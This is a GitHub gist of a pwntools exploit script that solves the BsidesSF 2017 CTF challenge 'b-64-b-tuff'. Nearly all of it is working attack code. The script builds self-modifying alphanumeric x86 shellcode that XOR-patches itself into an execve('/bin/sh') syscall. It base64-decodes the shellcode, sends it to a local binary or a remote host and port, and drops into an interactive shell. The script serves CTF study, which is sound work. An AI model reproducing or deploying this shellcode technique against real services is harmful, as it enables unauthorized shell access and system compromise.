Last active
February 22, 2017 22:08
-
-
Save Grazfather/df9bccf064dc80da0b907a617a127d5e to your computer and use it in GitHub Desktop.
BsidesSF 2017 CTF b-64-b-tuff solution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
from pwn import * | |
def exploit(): | |
r.recvuntil("start: ") | |
addr = r.recv(10) | |
addr = int(addr, 16) | |
print hex(addr) | |
valid = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9'] | |
code = """ | |
push eax | |
pop ecx # Use to store PC | |
push 0x58 | |
pop eax | |
xor al, 0x58 # eax = 0 | |
xor al, 0x7a | |
xor [ecx+0x42], al # XOR / in path | |
xor [ecx+0x43], al # XOR / in path | |
xor [ecx+0x4b], al # XOR / in path | |
xor al, 0x7a # eax = 0 | |
xor al, 0x63 | |
xor [ecx+0x50], al # XOR pop ebx | |
xor al, 0x63 # eax = 0 | |
xor al, 0x54 | |
xor [ecx+0x64], al # XOR sub al, 0x36 | |
xor al, 0x54 # eax = 0 | |
dec eax # eax = 0xffffff | |
xor [ecx+0x66], al # XOR first byte of syscall | |
xor [ecx+0x67], al # XOR second byte of syscall | |
push 0x58 | |
pop eax | |
xor al, 0x58 # eax = 0 | |
xor al, 0x4e | |
xor [ecx+0x67], al # XOR second byte of syscall | |
xor al, 0x66 # padding | |
xor al, 0x66 # padding | |
xor al, 0x66 # padding | |
xor al, 0x66 # padding | |
//xor eax,eax | |
push 0x58 | |
pop eax | |
xor al, 0x58 # eax = 0 | |
push eax | |
push 0x68735555 # needs patch | |
push eax | |
pop edx | |
push eax | |
pop edx | |
push 0x6e696255 # needs patch | |
// mov ebx,esp | |
push esp | |
//pop ebx # needs patch | |
.byte 0x38 | |
//mov ecx,eax | |
push eax | |
pop ecx | |
// mov edx,eax | |
push eax | |
pop edx | |
xor al, 0x66 # padding | |
xor al, 0x66 # padding | |
xor al, 0x66 # padding | |
xor al, 0x66 # padding | |
xor al, 0x66 # padding | |
xor al, 0x66 # padding | |
//mov al, 0xb | |
push 0x41 | |
pop eax | |
// sub al, 0x36 # 2b 36 Needs patch to 2b | |
.byte 0x78, 0x36 | |
//int 0x80 = cd 80 | |
.byte 0x32, 0x31 #int 0x80 after XORs | |
.byte 0x41 # padding | |
.byte 0x41 # padding | |
""" | |
sc = asm(code) | |
for b in sc: | |
if b not in valid: | |
print "{} ({:02x}) is not valid".format(b, ord(b)) | |
print disasm(sc) | |
print sc | |
sc += "===" | |
r.send(sc.decode('base64')) | |
r.interactive() | |
if __name__ == "__main__": | |
log.info("For remote: %s HOST PORT" % sys.argv[0]) | |
if len(sys.argv) > 1: | |
r = remote(sys.argv[1], int(sys.argv[2])) | |
exploit() | |
else: | |
r = process(["./b-64-b-tuff"], env={"LD_PRELOAD":""}) | |
log.info("PID: {}".format(util.proc.pidof(r))) | |
gdb.attach(r) | |
exploit() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment